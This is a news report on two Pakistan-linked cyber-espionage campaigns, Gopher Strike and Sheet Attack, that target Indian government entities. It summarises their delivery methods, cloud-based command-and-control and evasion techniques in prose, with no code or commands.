Cybersecurity researchers have identified a series of sophisticated Pakistan-linked cyber campaigns targeting Indian government entities, raising fresh concerns about state-aligned digital espionage and the evolving tradecraft of advanced persistent threat actors, multiple analysts confirm.
Threat intelligence teams, including Zscaler ThreatLabz, first spotted the operations in late 2025 and assigned the code names Gopher Strike and Sheet Attack to the two campaigns due to their distinct methodologies and payload delivery mechanisms.
Both operations appear to have been carried out by a threat actor believed to operate out of Pakistan. As per the detailed reports:
The campaigns named Gopher Strike and Sheet Attack, attributed with medium confidence to Pakistan-linked threat actors possibly related to or parallel with APT36, represent sophisticated cyber espionage operations targeting Indian government entities.
The campaigns demonstrate advanced operational security, including geo-fencing, user-agent checks, and ephemeral tool usage to avoid detection and attribution. No known exploits in the wild have been reported yet, but the campaigns highlight evolving tradecraft and the use of public infrastructure for stealthy espionage.
Gopher Strike leverages highly targeted spear-phishing emails that contain malicious attachments designed to impersonate legitimate documents. When recipients open these files, they trigger a sequence of actions that ultimately install remote access tools and backdoors on victim systems.
Detailed technical reports show Gopher Strike initiates payload delivery only if the connection originates from Indian IP addresses, a tactic that helps the attackers avoid unwanted detection and refine targeting.
Sheet Attack, meanwhile, blurs the lines between legitimate cloud usage and covert command-and-control infrastructure by using trusted platforms such as Google Sheets, Firebase, and email services as conduits for malicious traffic. By embedding instructions and data within these widely used tools, attackers can camouflage their activities and evade traditional security monitoring systems.
Researchers note that both campaigns demonstrate sophisticated evasion techniques, including geo-fencing, user agent checks, and multi-stage execution chains that prioritize stealth and persistence. Once initial access is secured, the adversary may deploy custom downloaders and backdoor tools capable of executing commands, exfiltrating data, and establishing footholds that are difficult to remove.
Zscaler also reported that their researchers also noticed the threat actor downloading RAR archives using cURL commands after breaching the victim’s machine. These archives contain tools designed to collect system information and deploy GOSHELL, a custom Golang-based loader that’s used to introduce Cobalt Strike Beacon following several rounds of decoding. Once the tools have served their purpose, they are removed from the machine.
This is not the first time Pakistan-linked hackers have been implicated in cross-border cyber operations targeting Indian networks. Analysts have previously uncovered campaigns attributed to APT36 and affiliated clusters that used remote access trojans to target government, military, and academic institutions. These intrusions often rely on deceptive delivery mechanisms, including weaponized Windows shortcut files and fake documents, to lure unsuspecting users into activating malicious code.
Independent media and regional reporting suggest that digital espionage tensions between India and Pakistan have intensified alongside broader geopolitical disputes, increasingly spilling into cyberspace with targeted attacks on critical infrastructure, government portals, and defense networks. Cyber espionage attacks became prevalent a lot more in the aftermath of the May 2025 war where the two neighbors resorted to nefarious means to undermine each other over terror charges.
Additional context from other cybersecurity research highlights similar trends, including campaigns that used unconventional command-and-control channels such as Discord features or social engineering lures disguised as legitimate applications. These examples underscore how sophisticated threat actors continually adapt their techniques to bypass detection and expand surveillance or data extraction efforts.